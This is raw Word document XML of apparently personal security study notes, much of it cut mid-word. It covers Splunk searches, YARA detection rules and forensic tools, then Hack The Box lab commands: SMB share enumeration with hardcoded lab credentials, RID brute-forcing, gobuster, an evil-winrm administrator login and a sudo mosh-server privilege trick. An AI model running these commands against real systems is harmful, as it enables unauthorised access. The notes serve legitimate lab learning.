      <w:r w:rsidRPr="00542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cessari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strings but the words does not have to come in order or in a row</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urce – filter for type of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 – filter for computer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www*” – print all the logs which contains “www”</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tats count – count the number o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tats count by source – counts the line by unite and count how many of each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ragent=”*” – print all the logs which contains this fiel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useragent=”*” – NOT does the oppo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ere count &gt; 100 – print only the lines which contains more than 100 duplicates (this command after appropriat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 table field1, field2, field3 – output the data in t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edup field1 – return only results which contains this field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C746ACF"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28D36"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107C"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38068"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37758"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9413E"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212D1"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B2A6"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C0749"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E3C8"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DAC84"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BADAA"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96F23"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FC258"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CD58E"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C6CC3"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0220D"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1890"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FE83F" w14:textId="238E22DF" w:rsidR="002B6D73" w:rsidRPr="002B6D73" w:rsidRDefault="002B6D73" w:rsidP="002B6D73">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tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B487813" w14:textId="7B44869A" w:rsidR="00A90AE7" w:rsidRDefault="00700CB9" w:rsidP="00700CB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ra - </w:t>
      </w:r>
      <w:r w:rsidRP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is a tool used to search and identify files on a computer based on specific rules that describe patterns or characteristics those files might exhibit</w:t>
      </w:r>
      <w:r w:rsidR="0059796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nort check rules on traffic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a contains </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6A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name</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data, Boolean conditions, string definitions</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extension of rule file is yar, for example rule1.yar</w:t>
      </w:r>
      <w:r w:rsidR="009B007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r file can contain few rules inside</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3CD2" w:rsidRP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rules/y2_rule.yar OFTSJEJKP</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yntax is to write yara, choose the .yar file that contains the rules, and the file that you want to check it on, the output will contain all the rules were true</w:t>
      </w:r>
      <w:r w:rsidR="00E13C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ll the rules are false, the output will be empt</w:t>
      </w:r>
      <w:r w:rsidR="00136B0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46F7E263" w14:textId="453FDC1F" w:rsidR="00BE6D2A" w:rsidRDefault="00BE6D2A" w:rsidP="00BE6D2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D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r [rule file] [path to sca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the if the rules met recursively in a directo</w:t>
      </w:r>
      <w:r w:rsidR="00C819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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA02CD8" w14:textId="58CA2931" w:rsidR="002B6D73" w:rsidRDefault="00A90AE7"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A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yara ../rules/y2_rule.yar "$file"; do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which rules are met in </w:t>
      </w:r>
      <w:r w:rsidR="00475A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in the directory</w:t>
      </w:r>
      <w:r w:rsidR="009B007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ntax</w:t>
      </w:r>
      <w:r w:rsidR="00F837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rule</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sidRPr="00700CB9">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B75446" wp14:editId="55952B32">
            <wp:extent cx="5274310" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="71038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0462" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2859405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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62B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name – ExampleMalwareDetection</w:t>
      </w:r>
      <w:r w:rsidR="00262B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eta – containd metadata as description of what the rules does, who is the author, date creation, and more for your </w:t>
      </w:r>
      <w:r w:rsidR="00F92F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don’t have to write metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CEA01" w14:textId="05DF0A61" w:rsidR="00700CB9" w:rsidRDefault="00700CB9"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 – contain variables that contain data as pattern of hex values, or strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B7862" w14:textId="25DB581E" w:rsidR="00700CB9" w:rsidRDefault="00700CB9"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 contain the logical check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354AD9A" w14:textId="3D0AF02A" w:rsidR="001A6D10" w:rsidRDefault="001A6D10"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for ru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6D1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30C3BE" wp14:editId="00B5FF9B">
            <wp:extent cx="4460631" cy="2043964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="225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613" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4477437" cy="2051665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="590FF457" w14:textId="088F24FE" w:rsidR="001A6D10" w:rsidRDefault="001A6D10" w:rsidP="001A6D1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the pattern </w:t>
      </w:r>
      <w:r w:rsidRP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 50 4E 47 0D 0A 1A 0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ile for find hidden png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D07DB14" w14:textId="6440BF53" w:rsidR="009C77E4" w:rsidRDefault="001A6D10"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D1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CE2B87" wp14:editId="50B0A9E3">
            <wp:extent cx="5274310" cy="1423035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="12121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9279" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1423035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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E5B667" w14:textId="77777777" w:rsidR="005324F1" w:rsidRDefault="001A6D10" w:rsidP="003E0CC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he string “</w:t>
      </w:r>
      <w:r w:rsidRP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cious-site.co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no case sensitivity in the file</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rings:</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 “malicious” –  for search a string</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sidRP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 { 4D 5A }</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search pattern</w:t>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ase – for ignore case sensitivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3BF58" w14:textId="43311ADC" w:rsidR="009C77E4" w:rsidRDefault="005324F1" w:rsidP="00162FA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 – true only when $A rule is met </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0012"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nd $B</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 only when both rules are met</w:t>
      </w:r>
      <w:r w:rsid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62FAA" w:rsidRP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 $B</w:t>
      </w:r>
      <w:r w:rsid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ure if one of the rules is met</w:t>
      </w:r>
      <w:r w:rsidR="00C667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66798"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_header</w:t>
      </w:r>
      <w:r w:rsidR="00C667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 only if the pattern found in the file somewhere </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0012"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_header at 0</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166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when the header found in offset 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and $a2 and $a3 and ( 1 of ($a4, $a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ule is </w:t>
      </w:r>
      <w:r w:rsidR="00E166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when a1,a2,a3 are true and one or two of a4,a5 are true</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D42B39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E4B6"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781E3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 – good tool for investigate pcap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K imager – you can load to this tool file or vmdk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use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know hot to find a file by the extension name in the contrary of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us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 – a tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E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 – process monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4"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DCD"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3A13"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4F50"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03C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0B1A"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9DF02"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194C"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D9925"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C88E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42C1"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15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D9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c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ot – files required to boot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 – you can load file or url and it checks it hash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y.run – you can scan virus through this site but oppose to virustotal, this site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58C68C" w14:textId="22602D43" w:rsidR="004A630B" w:rsidRDefault="004A630B" w:rsidP="004A6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I been pwned – the site purpose is to check if your email address is pwned, it check if your email address is found </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6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nown data breaches</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 – site that helps in convertions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 – site for passive scans, its has its own syntax, os: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cupp”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atRat – tool for creating payloads, it also cooperate with msfvenom</w:t>
      </w:r>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util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hitech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ns.info – a site that get as input ip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ttrack </w:t>
      </w:r>
      <w:hyperlink r:id="rId24"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ox – investigate as PT and get lil info as ip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box - investigate as PT and get mediocre info as ip domains url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itebox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 – strong tool that scan similar to nmap but has its advantages and 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 – meaning smb</w:t>
      </w:r>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powershell – if write it in terminal or cmd, you can open powershell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portable file or installer file is the installer you are install on the computer what take more time and you cant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ter inside share directory of windows we can write in linux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052626A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73F"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CA5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147A"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BB1"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F7715" w14:textId="77777777" w:rsidR="002F7AA6" w:rsidRDefault="002F7AA6" w:rsidP="00AD5A9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3095" w14:textId="019D4054"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CE8420" w14:textId="1701393B" w:rsidR="002F7AA6" w:rsidRPr="00294C81" w:rsidRDefault="002F7AA6" w:rsidP="002F7AA6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF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 From HTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593C972" w14:textId="77777777" w:rsidR="000F4B21" w:rsidRDefault="00F663C6" w:rsidP="000F4B2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mbmap -H 10.10.10.10 -u admin – may let you see the names of the share directories, and permissions (smb port need to be opened)</w:t>
      </w:r>
      <w:r w:rsidR="000318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mbmap -H 10.10.10.10 -u Michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’</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re directories and the permissions the user ha</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ach directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F586D1" w14:textId="2F3B0C24" w:rsidR="00F663C6" w:rsidRPr="008D7550" w:rsidRDefault="000F4B21" w:rsidP="000F4B2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L //10.10.11.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the available smb shares on the targ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63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10.10.11.35/HR – mey let you see the co</w:t>
      </w:r>
      <w:r w:rsidR="009C55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00F663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of the shared directory</w:t>
      </w:r>
      <w:r w:rsidR="00765F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t without password)</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bclient //10.10.11.35/SYSVOL -U michael.wrightson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Cicada$M6Corpb*@Lp#nZp!8' -c 'recurse; ls' &gt; sysvol_contents.txt</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y the right credentials, command retrieve and save all the files inside the share directory into new text file, which let us use text manipulation easily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E25D49" w14:textId="7904A4F0" w:rsidR="006E6E60" w:rsidRDefault="006E6E60"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ket-lookupsid </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="005B62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let you find usernames</w:t>
      </w:r>
      <w:r w:rsidR="000901F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SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B77687" w14:textId="42E7962C" w:rsidR="00E57366" w:rsidRPr="00E57366" w:rsidRDefault="00ED1F4A" w:rsidP="00C645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buster – </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te force tool to find subdirectories, files, and </w:t>
      </w:r>
      <w:r w:rsidR="00A648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w:t>
      </w:r>
      <w:r w:rsidR="008D68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ed to use file that contain names for the process (as a file full of common domain names for find doma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55877" w:rsidRP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dir -u http://10.129.64.106 -w /usr/share/wordlists/rockyou.txt</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300</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on a target to find a directory</w:t>
      </w:r>
      <w:r w:rsidR="000F1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ip, it get wordlist as input and use it to find exist directori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vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u</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6" w:history="1">
        <w:r w:rsidR="00E57366" w:rsidRPr="00506CE9">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thetoppers.htb</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ir -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aths within a domain, looking for directories and fil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host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otential subdomains or host names under a domain</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to the wordlist</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URL</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 specify the amount of tries simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C780A" w14:textId="54C85EF6" w:rsidR="00A43E0A" w:rsidRDefault="00A43E0A" w:rsidP="00E573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R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stands for Windows Remote Management, is a feature of Windows that allows administrators to remotely manage and execute programs on Windows machines over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winrm -i 10.129.136.91 -u administrator -p badmint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credentials you can connect and run powershell commands</w:t>
      </w:r>
      <w:r w:rsidR="009C2C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 – pass the has</w:t>
      </w:r>
      <w:r w:rsidR="00D92D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BC52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p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4836D" w14:textId="6D4419B2" w:rsidR="007953FC" w:rsidRDefault="007C7FB7" w:rsidP="007953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h (mobile shell) - </w:t>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a command used to initiate remote sessions, similar to SSH but with features that make it particularly useful in certain scenario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SSH, which uses TCP, Mosh operates over UDP</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allows you to roam without needing to re-establish the connection. It keeps the session alive even if your IP address changes, which is not possible with SSH without additional tools or setting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client and server require the installation of Mosh. It's not included by default on most systems, unlike SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCF28D" w14:textId="2BA478BB" w:rsidR="007C7FB7" w:rsidRDefault="007C7FB7" w:rsidP="007C7F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server="sudo /usr/bin/mosh-server" local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ablish new session with mosh, and if password is not required with sudo, we will get privileged </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r w:rsidR="006337E7" w:rsidRP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username@remote-host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D9915" w14:textId="6E22E2AB" w:rsidR="003028A6" w:rsidRPr="00136837" w:rsidRDefault="007C1A63" w:rsidP="007C7F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A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 smb 10.10.11.35 -u guest -p "" --rid-brute | grep "SidTypeUser"</w:t>
      </w:r>
      <w:r w:rsidR="00302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ld find usenames by exploiting the smb service</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ear security that even guest can en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te force on every ID for find all the us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by grep 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nly user accounts</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028A6"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41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="830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B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="647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E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="710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626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C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735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18E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677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="177081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18ED"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00032ED0"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="0008798C"/>
    <w:rsid w:val="000901F3"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000B701D"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000C53C8"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D2058"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="000F1522"/>
    <w:rsid w:val="000F4B21"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00106767"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="001350E9"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="00136B08"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00156435"/>
    <w:rsid w:val="00162FAA"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6792"/>
    <w:rsid w:val="001A6D10"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E3594"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="00213353"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00223FFD"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="002327B6"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00262B9E"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="002735B4"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00295DAD"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002A76A9"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002B6D73"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002E305B"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4142"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="002F7AA6"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="003028A6"/>
    <w:rsid w:val="0030573E"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="00341071"/>
    <w:rsid w:val="00344202"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="00377343"/>
    <w:rsid w:val="00387254"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="00396E02"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003D7F7A"/>
    <w:rsid w:val="003E0CCB"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="003E2099"/>
    <w:rsid w:val="003F1545"/>
    <w:rsid w:val="003F5E38"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="004254A3"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="00475AA5"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="0049380C"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004A630B"/>
    <w:rsid w:val="004B0D4A"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="005324F1"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="00542E0A"/>
    <w:rsid w:val="00543B82"/>
    <w:rsid w:val="00551CAF"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="00576AB2"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="0059269A"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="0059796B"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E3C91"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="005F218B"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="0063375E"/>
    <w:rsid w:val="006337E7"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00645B2C"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="0067255A"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C3CD2"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006E6E60"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00700CB9"/>
    <w:rsid w:val="00702525"/>
    <w:rsid w:val="00715982"/>
    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="007266A6"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="00765F72"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="007804A1"/>
    <w:rsid w:val="00781E38"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007953FC"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C1A63"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007C7FB7"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007D6CBF"/>
    <w:rsid w:val="007E69AC"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00854073"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="00885DB4"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008B628C"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D1842"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008D68B3"/>
    <w:rsid w:val="008D7550"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009125AA"/>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13B4"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A1A89"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009A6AD5"/>
    <w:rsid w:val="009B0073"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C2C1D"/>
    <w:rsid w:val="009C3587"/>
    <w:rsid w:val="009C5518"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A03D5B"/>
    <w:rsid w:val="00A04B0D"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A43E0A"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A648B2"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00A90AE7"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD4E61"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00AF237E"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B253FA"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
